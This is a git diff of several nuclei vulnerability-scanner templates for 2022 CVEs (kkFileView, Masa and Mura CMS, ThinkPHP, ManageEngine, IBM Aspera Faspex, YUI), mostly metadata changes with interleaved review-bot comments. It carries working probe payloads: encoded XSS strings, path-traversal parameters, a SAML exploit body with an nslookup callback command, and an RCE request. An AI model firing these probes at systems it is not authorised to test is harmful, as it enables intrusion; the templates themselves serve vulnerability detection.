@@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a3dfbb763339ab7600b149a363bfd71ea686c3f6d334c4cdcbe8f2085443d0e02204351fb7b62b842401f1c59beb44c717ab03fc07bf6261df3006d3e509629fcfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46934.yaml b/nuclei-templates/CVE-2022/CVE-2022-46934.yaml index 6297e623fc..1cc5c60c65 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46934.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46934.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/411 - https://nvd.nist.gov/vuln/detail/CVE-2022-46934 
@@ -14,29 +18,31 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* - epss-score: 0.00085 + epss-score: 0.05604 + epss-percentile: 0.92519 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - verified: true - tags: xss,cve,cve2022,kkfileview + tags: cve,cve2022,xss,kkfileview,keking http: - method: GET path: - - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmNvb2tpZSk7Ly8=&urls" + - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls" matchers-condition: and matchers: - type: word words: - - "alert(document.cookie)" - - "document.getElementById" + - document.getElementById("http://");alert(document.domain);//").click(); + - viewer.min.css condition: and - type: status status: - 200 - -# Enhanced by md on 2023/04/13 +# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47002.yaml b/nuclei-templates/CVE-2022/CVE-2022-47002.yaml index fdc1c7408d..7e75887974 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47002.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47002.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47002 cwe-id: CWE-863 - epss-score: 0.03698 - epss-percentile: 0.90756 + epss-score: 0.0395 + epss-percentile: 0.91808 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: masacms product: masacms shodan-query: 'Generator: Masa CMS' - tags: cve,cve2022,auth-bypass,cms,masa + tags: cve,cve2022,auth-bypass,cms,masa,masacms http: - raw: @@ -74,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4a0a004730450220185e1dd863ff1a35f801012c1424bd6d6146286c33ca9a56aede709ec7e5a499022100e738cb43714b09f233773be9e83b5f152f96cee2b015de5213a857ca578ea480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47003.yaml b/nuclei-templates/CVE-2022/CVE-2022-47003.yaml index 3e945f5a90..0b3e0366f1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47003.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47003.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application. remediation: | Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. reference: @@ -19,16 +21,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47003 cwe-id: CWE-863 - epss-score: 0.03016 - epss-percentile: 0.89866 + epss-score: 0.02341 + epss-percentile: 0.88676 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: murasoftware product: mura_cms - shodan-query: 'Generator: Musa CMS' - tags: cve,cve2022,auth-bypass,cms,mura + shodan-query: 'Generator: Mura CMS' + tags: cve,cve2022,auth-bypass,cms,mura,murasoftware http: - raw: @@ -74,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4b0a00483046022100ef355cbfd34268757f09531c9b4788b834d6527f81af106393337503e4a4d84102210087d8dbf6f5a352cd7cd177e037d94f18990f1082b7daacebe779a1e72f4a6ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220440774df54f926d2f453b8d155ef6d625b0cf8b3bd6ae2c520e5bd1f2cd549d80220543f2ab0ffb604510676033c32003ea4f5ad46e6ea52fcd536b79e3eb9d5e4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47075.yaml b/nuclei-templates/CVE-2022/CVE-2022-47075.yaml index 0c49a5c68d..efd1c30340 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47075.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47075.yaml 
@@ -16,15 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 - epss-score: 0.00409 - epss-percentile: 0.70989 + epss-score: 0.00614 + epss-percentile: 0.76423 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true max-request: 1 vendor: smartofficepayroll product: smartoffice - tags: packetstorm,cve,cve2022,smart-office,info,exposure + tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll http: - method: GET @@ -38,4 +38,4 @@ http: - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and -# digest: 490a0046304402203e1843e1d611eb18b914bdfe592e4be4f50e3b4f2b3ee69b10222173bbc5d89c02206003f5bc64ec666cd68d917439ad327fb6829250256c6c6234f4885a4bbb8101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47615.yaml b/nuclei-templates/CVE-2022/CVE-2022-47615.yaml index bcf92d2bcb..79ca1ad0db 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47615.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47615.yaml 
@@ -6,19 +6,22 @@ info: severity: critical description: | Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure. remediation: | Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2022-47615 - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve + - https://github.com/RandomRobbieBF/CVE-2022-47615 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.00729 - epss-percentile: 0.78576 + epss-score: 0.01111 + epss-percentile: 0.84217 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress" - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: - raw: @@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a212abcd18616e4d0b02618ef2d905b4f6b3ddfd7f4c3b65de72b5ae6833dec302210088aa9556cd5ca1cbd0706c4e2b09fa655f473b217ca4dc1ee974f505518ecaad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47945.yaml b/nuclei-templates/CVE-2022/CVE-2022-47945.yaml index 1c551d9087..57cb7e14bf 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47945.yaml 
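Review bot: The reference added at the end of the list, `https://github.com/RandomRobbieBF/CVE-2022-47615`, points to the same repository as the existing first entry `https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main`; keep one of them rather than listing the repository twice. The other changes in these hunks (impact, epss, tags, digest) are metadata only. The unchanged context line `cwe-id: CWE-434` (unrestricted file upload) sits next to a description and `lfi` tag that call this a local file inclusion; it is not part of the change, but it is worth a look while the classification block is being edited.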
+++ b/nuclei-templates/CVE-2022/CVE-2022-47945.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + Apply the latest security patches and updates provided by the Thinkphp framework. reference: - https://tttang.com/archive/1865/ - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 @@ -15,19 +19,27 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47945 + cwe-id: CWE-22 + epss-score: 0.03747 + epss-percentile: 0.90906 + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: - fofa-query: header="think_lang" + verified: true + max-request: 2 + vendor: thinkphp + product: thinkphp shodan-query: title:"Thinkphp" - verified: "true" + fofa-query: header="think_lang" tags: cve,cve2022,thinkphp,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/?lang=../../thinkphp/base" - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -40,5 +52,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47966.yaml b/nuclei-templates/CVE-2022/CVE-2022-47966.yaml index ad4d5b7d34..d94cd6858d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47966.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47966.yaml 
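Review bot: The new `remediation` text, `Apply the latest security patches and updates provided by the Thinkphp framework.`, is vaguer than the description, which already states the fixed version; prefer `remediation: Upgrade ThinkPHP to 6.0.14 or later.` and spell the product as ThinkPHP as the description does. The added `matchers-condition: and` now requires the word matcher and the `500` status matcher to fire together; the word list itself lies outside this hunk, so I could not confirm both still match on an affected target. `max-request: 2` agrees with the two paths in the request.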
@@ -6,25 +6,35 @@ info: severity: critical description: | Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html - https://nvd.nist.gov/vuln/detail/CVE-2022-47966 + - http://packetstormsecurity.com/files/170882/Zoho-ManageEngine-ServiceDesk-Plus-14003-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 + epss-score: 0.97422 + epss-percentile: 0.9993 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_access_manager_plus shodan-query: title:"ManageEngine" - verified: "true" - tags: cve,cve2022,rce,zoho,manageengine,oast,kev - + tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp variables: cmd: 'nslookup {{interactsh-url}}' - SAMLResponse: ' a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= 
RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== ' + SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== -requests: +http: - raw: - | POST /SamlResponseServlet HTTP/2 @@ -48,3 +58,4 @@ requests: - type: status status: - 500 +# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47986.yaml b/nuclei-templates/CVE-2022/CVE-2022-47986.yaml index a75c3b60a2..0128412d08 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47986.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47986.yaml 
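Review bot: The new `cpe`, `vendor: zohocorp` and `product: manageengine_access_manager_plus` pin this template to one product, while the description says the flaw affects multiple ManageEngine on-premise products and names ServiceDesk Plus as its example, and the `shodan-query: title:"ManageEngine"` is equally broad; anyone filtering on the product metadata will miss the other affected products. Either widen the product field or add a comment next to the `cpe` line such as `# affects multiple ManageEngine products; the CPE below is one representative entry`. The `SAMLResponse` variable lost its single quotes and now spans lines as a plain scalar; if the value really is multi-line, both forms fold the break into a space, so as far as I can tell this changes nothing at runtime.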
@@ -1,25 +1,37 @@ id: CVE-2022-47986 info: - name: Pre-Auth RCE in Aspera Faspex + name: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution author: coldfish severity: critical description: | - IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. + IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. reference: - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/ - https://www.ibm.com/support/pages/node/6952319 - remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability. 
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 + - http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-47986 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47986 + cwe-id: CWE-502 + epss-score: 0.9223 + epss-percentile: 0.98769 + cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: ibm + product: aspera_faspex shodan-query: html:"Aspera Faspex" - tags: cve,cve2022,ibm,aspera,faspex + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm -requests: +http: - raw: - | POST /aspera/faspex/package_relay/relay_package HTTP/1.1 @@ -31,15 +43,16 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - - type: word part: header words: - "text/html" + - type: regex + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + - type: status status: - 500 +# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48012.yaml b/nuclei-templates/CVE-2022/CVE-2022-48012.yaml index 2e62912c98..3ddb48c252 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48012.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48012.yaml 
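Review bot: `remediation:` in this hunk is one long plain scalar, while the sibling `impact: |` and the other templates in this commit (for example CVE-2022-47002 and CVE-2022-47003) write remediation as a `|` block scalar; use `remediation: |` followed by the indented text so the info block is uniform. The regex matcher was moved below the header word matcher without a `part:`; if the default part is being relied on, adding `part: body` next to `regex:` makes the intent explicit and mirrors the `part: header` on the word matcher. The raw request the matchers apply to starts inside the hunk but continues outside it.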
@@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48012 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29441 + epss-score: 0.00112 + epss-percentile: 0.43742 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +54,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 490a004630440220535d58625037496b4ccb2b12d7e617d35ad0a1d5018b5b75566a18ebfcb23b170220053e49612cb0174001bfa5c9706f7b33f286177e468ab8e9e239cdeaa2c8eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48165.yaml b/nuclei-templates/CVE-2022/CVE-2022-48165.yaml index 7665b234e6..7684a3ebc6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48165.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48165.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations. + impact: | + The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: @@ -19,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48165 cwe-id: CWE-284 - epss-score: 0.02709 - epss-percentile: 0.89383 + epss-score: 0.04111 + epss-percentile: 0.9131 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: wavlink product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 - tags: cve,cve2022,wavlink,router,exposure + tags: cve2022,cve,wavlink,router,exposure http: - method: GET @@ -57,4 +59,4 @@ http: - type: regex regex: - 'Password=([^\s]+)' -# digest: 490a00463044022046e96cd32160d980ace726b82e83ecfbde1a11a5ae0b59434ee334430ec154c60220283e5c5a7f97616c9b25a70acdcd0d9794e75cba4b2cba113ff6b862a30ecf40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48197.yaml b/nuclei-templates/CVE-2022/CVE-2022-48197.yaml index 759177c67e..bf7df1101d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48197.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48197.yaml 
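Review bot: The rewritten `tags` line starts `cve2022,cve,...`, whereas the other tags lines in this commit start `cve,cve2022,...`; reorder it to `tags: cve,cve2022,wavlink,router,exposure` for consistency. The same reversed order appears in the new tags line of cve-2022-0208.yaml further down. The remaining changes in these hunks are metadata and digest updates.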
@@ -18,8 +18,8 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2022-48197
 cwe-id: CWE-79
- epss-score: 0.00139
- epss-percentile: 0.49291
+ epss-score: 0.0012
+ epss-percentile: 0.45243
 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*
 metadata:
 verified: true
@@ -27,20 +27,23 @@ info: vendor: yui_project product: yui shodan-query: html:"bower_components/yui2/" - tags: packetstorm,yui2,cve,cve2022,xss,yahoo,treeview + tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project http: - method: GET path: - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - 
"/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true @@ -61,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8e6bc7263fafdf6faa7d0972fa731f63137f6de42a429a124f23bd09da540e0022100b56ccb22cb37558b3a43c7761357663920118050439e6e7d24874ec1d001d64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200aa8dc45df93b31a509392bc137d444a730cbc113463d4d68a4cfb6d1e29e7b902202a7bcbef9175bddea3bf0e2803fecb56207e4961e90ae4011704631f27b92908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4897.yaml b/nuclei-templates/CVE-2022/CVE-2022-4897.yaml index 43d78b7f9d..15c127aa44 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4897.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4897.yaml 
